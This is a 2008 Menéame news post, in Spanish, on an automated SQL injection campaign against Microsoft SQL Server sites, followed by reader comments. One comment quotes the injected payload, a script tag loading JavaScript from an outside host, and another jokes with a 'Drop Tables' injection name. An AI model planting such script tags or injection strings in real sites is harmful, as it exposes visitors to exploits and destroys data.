Eli
219meneos

Infección masiva afecta a decenas de miles de sitios web

[C&P]Algo que parece ser en su origen un ataque automatizado de inyección SQL, afectando probablemente sólo a servidores Microsoft SQL Server (en opinión de Symantec), ha logrado infectar en los últimos días decenas de miles de sitios web. Al parecer el ataque añade el enlace a un script malicioso a las entradas de la base de datos, lo que convierte a los sitios web afectados en intermediarios involuntarios de la distribución de diversos exploits.

 15 comentarios en: tecnología, seguridad karma: 765
etiquetas: infección, sql server
votos negativos: 1  usuarios: 143  anónimos: 76  
  1. #1   » ver comentario
    por --67063-- el 07-01-2008 19:08
  2. #2   comentarios de "eso pasa por no usar linux".....

    ____________________________________________________
    votos: 4, karma: 11
    por piquet el 07-01-2008 19:31
  3. #3   #1 Uf. Duele muchísimo leer eso, por el HOYGANISMO más que nada, aparte del sinsentido del contenido.
    votos: 1, karma: 18
    por Abu3 el 07-01-2008 21:30
  4. #4   » ver comentario
    por --65233-- el 07-01-2008 22:21
  5. #5   Eso pasa por confundir seguridad con software.

    #2 ¿así cuenta? :P

    PD: explicación para los de negativo rápido: el marketing -entre otros el de Microsoft- intenta vendernos que el software aporta seguridad, cuando el software no es más que una de las herramientas para implementar un plan de seguridad, al lado de otras herramientas como el sentido común, pruebas de intrusión, buenas prácticas y experiencia. De ahí que quien más se cree las paparruchas marketingueras, por ejemplo de Microsoft que es de los que más pasta dedican a estos temas, es quien antes cae ante un fallo de seguridad.
    votos: 3, karma: 45
    por JarFil el 08-01-2008 01:40
  6. #6   Y yo preocupandome por cosas triviales como cuando quitar el arbolito de navidad que tanto me ha costado poner.. ainsssssss
    votos: 1, karma: 18
    por ReBoRN el 08-01-2008 03:04
  7. #7   Sólo cabe decir una cosa...

    (poniendo el dedo en la boca al estilo miniyo)
    MWUAAAA HAA HAA HA HA HA...
    votos: 1, karma: 18
    por pubo68 el 08-01-2008 04:11
  8. #8   Yo me llamo Daniel"; Drop Tables; y antes tenía un montón de problemas al registrarme en foros.

    Es del todo injusto, espero que lo mejoren pronto.
    votos: 9, karma: 79
    por iTor el 08-01-2008 04:17
  9. #9   Solo he de decir que después del enésimo ataque de malware he dedicido pasar de microsoft después de meter una distro normalita de debian tengo el pc tan blindado que tengo hasta que dar permiso a menéame para traspasar el cortafuegos :-)
    votos: 5, karma: 19
    por MayoriaSilenciosa el 08-01-2008 08:30
  10. #10   » ver comentario
    por --10745-- el 08-01-2008 09:35
  11. #11   » ver comentario
    por --6151-- el 08-01-2008 09:46
  12. #12   #2 ¿Linux? Eso pasa por no usar una BDD de libre en un sistema GNU con el nucleo que quieras, pero libre.
    votos: 3, karma: 37
    por benjami el 08-01-2008 09:54
  13. #13   atension, si reciben un mail con el tema script base de datos mola un wevo, no lo habran, es una antorcha que te "quema" el contenido del disco rigido C, symantec panda y airsoft no saben que hacer para arreglarlo, es mejor recibir esto 2^24 veces que infectarte, por favor pasalo

    (me falta el tamaño 40 de letra, todo mayusculas, mas hoygan, y las letras moradas o otro color hortera, y ya tenemos otra maravillosa cadena del msn....)

    #11 y demases, acaso mysql no se puede poner en linux con el famoso php apache linux y mysql??????? o esto es una ida de olla muy grande mia? :S si alguien me lo puede aclarar plz
    votos: 1, karma: -1
    por Neofito el 08-01-2008 09:55
  14. #14   #11 programita ajaja, real como la vida misma!

    muchos admins de windows basan su trabajo en tres pilares fundamentales:
    - han encontrado un programita shareware que hace tal o cual función (¿hacer ellos un programa o script? uff no, eso es de cuando estudiaban)
    - toquitear los widgets, clicar checkboxes, boton derecho-> propiedades a todo (¿leer un manual? para qué si puedes hacerlo por prueba y error)
    - suena el teléfono, alguien no puede imprimir/facturar/abrir un archivo... solución: le manda reiniciar (¿averiguar la causa del error? nunca! siempre parchecitos)
    votos: 1, karma: 18
    por xeper el 08-01-2008 10:18
  15. #15   <script src=http://c.uc8010.com/0.js></script>

    Con lo poco que puedo entender, esta inyección ¿no hace que se incluya esa línea en el código de la página, bien sea al principio, bien sea en un enlace... para que se ejecute al cargarla o al pinchar en el enlace?.
    Buscad 8010 en el código de:
    64.233.183.104/search?q=cache:1JyHj8JalOAJ:www.musica.com/verwallpapera

    ¿No existen inyecciones SQL para MySQL?
    www.vnunet.es/Actualidad/Noticias/Seguridad/Vulnerabilidades/2006060508
    www.hacktimes.com/?q=node/31

    Entonces, desde lo poco que sé pregunto:
    ...  » ver todo el comentario
    votos: 4, karma: 39
    por kadmon el 08-01-2008 10:41
comentarios cerrados

menéame